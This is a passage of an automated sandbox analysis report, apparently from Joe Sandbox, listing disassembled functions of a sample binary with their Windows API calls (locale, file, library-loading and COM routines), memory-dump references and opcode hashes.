                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                          • Opcode ID: 3846bbb7254ff08ee6c491d5144b013fc0687426d454b0347b3fd0b2d0de760e
                                                                                                                                          • Instruction ID: 1e7dd25d4c03343320870832b3c470f33c54189609cd0c3ac7ad3ae35d26932d
                                                                                                                                          • Opcode Fuzzy Hash: 3846bbb7254ff08ee6c491d5144b013fc0687426d454b0347b3fd0b2d0de760e
                                                                                                                                          • Instruction Fuzzy Hash: DB417C71D4021AAFDF11EBEACDC9ADEB3FDAB08350F5445A5A148E7241EB309A448F54
                                                                                                                                          Function 02A95BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A95BE8
                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A95BF5
                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A95BFB
                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A95C26
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95C6D
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95C7D
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95CA5
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95CB5
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A95CDB
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A95CEB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                          • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                          • Instruction ID: 9f09ea6d198fe9b3f28049ffbb9fc4b3ad6b2bb02c5de019e932296389eac57c
                                                                                                                                          • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                          • Instruction Fuzzy Hash: 37318671E4026D29EF26D6B58CC6BDEB7ED9B04384F4401A19608E6181EE749A44CF50
                                                                                                                                          Function 02AADC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02A94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A94F2E
                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADD5E), ref: 02AADCCB
                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02AADD05
                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02AADD32
                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02AADD3B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                          • Opcode ID: a2a46616abd754487583454b86adb4276582f0573961cf32d0796d19636838e8
                                                                                                                                          • Instruction ID: 97c16740fed6c8e4612d3f83138f6273a7159c055687055bd3fd5dac0d609fff
                                                                                                                                          • Opcode Fuzzy Hash: a2a46616abd754487583454b86adb4276582f0573961cf32d0796d19636838e8
                                                                                                                                          • Instruction Fuzzy Hash: BD21EE71A81609BEEB10EA94CD52FDEB7BDEF08B04F514461B600F75C0DBB46A058B64
                                                                                                                                          Function 02AADBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RtlI.N(?,?,00000000,02AADC7E), ref: 02AADC2C
                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC42
                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC61
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Path$DeleteFileNameName_
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4284456518-0
                                                                                                                                          • Opcode ID: 3c3aa9ce43d245acc35ab01bb146c5a04b9e229c3502ee9239558b355969a0a2
                                                                                                                                          • Instruction ID: 3b790708687cfb13ab32bf863ca386910c2b5f9fc4f3a588f69acef1d8335997
                                                                                                                                          • Opcode Fuzzy Hash: 3c3aa9ce43d245acc35ab01bb146c5a04b9e229c3502ee9239558b355969a0a2
                                                                                                                                          • Instruction Fuzzy Hash: CF016275985A086EEB05EBB0CE51FCD77B9AF48708F5144929280FB481DFB4AB048B24
                                                                                                                                          Function 02AADC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02A94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A94F2E
                                                                                                                                          • RtlI.N(?,?,00000000,02AADC7E), ref: 02AADC2C
                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC42
                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC61
                                                                                                                                            • Part of subcall function 02A94C60: SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1530111750-0
                                                                                                                                          • Opcode ID: e36a5c6efdc41e72a813133955915905ae7e4f644d3f1e8fa6e9504c5dc106e8
                                                                                                                                          • Instruction ID: 6a72ada71fe318a431daa0817b1e0f63a1e64f2a129a5ed29f6f3b64ca37ac46
                                                                                                                                          • Opcode Fuzzy Hash: e36a5c6efdc41e72a813133955915905ae7e4f644d3f1e8fa6e9504c5dc106e8
                                                                                                                                          • Instruction Fuzzy Hash: 9701217598060CBEEB01EBA0DE52FCDB3FDEB48704F5044A2A240E7580EF746B048A64
                                                                                                                                          Function 02A97FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02A97FF5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                          • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                          • Instruction ID: 3f3cbcd95e543446f7f0efd9875f6055967daf9d5b0cadac6b67cb5ccc7881e2
                                                                                                                                          • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                          • Instruction Fuzzy Hash: F111C0B5E00209AF9B04CF99C981DBFF7F9FFC8700B54C569A509E7254E6719A018BA0
                                                                                                                                          Function 02A9A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoLocale
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                          • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                          • Instruction ID: cbed90ffc0c27c8e33b38ea2bb7aba6e621fa97542bb7b753c387ccfd509de89
                                                                                                                                          • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                          • Instruction Fuzzy Hash: 94E0D87170422457DB15A69A9D81EFA72ED9B5C710F00427BBE05C7385EDE19E804BE4
                                                                                                                                          Function 02A9B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetVersionExA.KERNEL32(?,02ABD106,00000000,02ABD11E), ref: 02A9B79A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Version
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                          • Opcode ID: c4ad6beb2c5bb836c50da6b15f055a4b3724536a13fa5c823ff0e69f5b950f95
                                                                                                                                          • Instruction ID: 0ddab9458f0a4fe180678bab31b276f20c529ff2a578e6f8063a7c9fe9c9432f
                                                                                                                                          • Opcode Fuzzy Hash: c4ad6beb2c5bb836c50da6b15f055a4b3724536a13fa5c823ff0e69f5b950f95
                                                                                                                                          • Instruction Fuzzy Hash: 97F04474944301DFC741CF29E64065573E9FB48B00F808D28E688C3B91EF38C495CB62
                                                                                                                                          Function 02A9A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02A9BE72,00000000,02A9C08B,?,?,00000000,00000000), ref: 02A9A823
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoLocale
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                          • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                          • Instruction ID: b94794543684ccc95b0f2fb744dc54b6444bf11f983ca16ebed85db535116cba
                                                                                                                                          • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                          • Instruction Fuzzy Hash: 9FD05EB230E2602AAA14925B2D84D7B5AECCAC57A1F00803ABA88C6102DE008C07DAB1
                                                                                                                                          Function 02A9920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LocalTime
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                          • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                          • Instruction ID: c168220f45e66db2a600ffd00f4f34e7a72a40da258ad0e3242294ce1a5bdeef
                                                                                                                                          • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                          • Instruction Fuzzy Hash: 4FA01250444820418D4033190C0253430845C10E20FC4874068F8402D0ED1D01208093
                                                                                                                                          Function 02A920C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                          Function 02A9D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02A9D29D
                                                                                                                                            • Part of subcall function 02A9D268: GetProcAddress.KERNEL32(00000000), ref: 02A9D281
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                          • Opcode ID: 7c5a993392f8a2c1659a4ca24ac6467aa1c00b8225103fbec6358798331d3fb5
                                                                                                                                          • Instruction ID: 8d906a3fc74f420232bc5b62114f01056b80137afd68b961e479abca0a6db84a
                                                                                                                                          • Opcode Fuzzy Hash: 7c5a993392f8a2c1659a4ca24ac6467aa1c00b8225103fbec6358798331d3fb5
                                                                                                                                          • Instruction Fuzzy Hash: CA411B71AC8B085B5E08BA6F7600427F7DED79AB543E0461BF4458B380DE20FCD29E69
                                                                                                                                          Function 02AA6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02AA6EDE
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02AA6EEF
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02AA6EFF
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02AA6F0F
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02AA6F1F
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02AA6F2F
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02AA6F3F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                          • API String ID: 667068680-2233174745
                                                                                                                                          • Opcode ID: f733442199b730928d56e38f1b5b8e9e822eea45a578f868fe80d2370ce144e7
                                                                                                                                          • Instruction ID: 9ad088871dd17d72a94733978f16db9e130b4afcba8113e68722ace5994705c2
                                                                                                                                          • Opcode Fuzzy Hash: f733442199b730928d56e38f1b5b8e9e822eea45a578f868fe80d2370ce144e7
                                                                                                                                          • Instruction Fuzzy Hash: 70F098F2AC83807DBE05BB715E9186A279DBD21F053482C1AAA0356552EF7A9421CE10
                                                                                                                                          Function 02A92530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02A928CE
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message
                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                          • API String ID: 2030045667-32948583
                                                                                                                                          • Opcode ID: 891113bbb035af123a09c9c0d32621887dfd9263a54834c933df4e932387b6bf
                                                                                                                                          • Instruction ID: 280c3dae7e4e08bdc340302f70642382397af7f3f6aa4013dd78685bd1d8b2bd
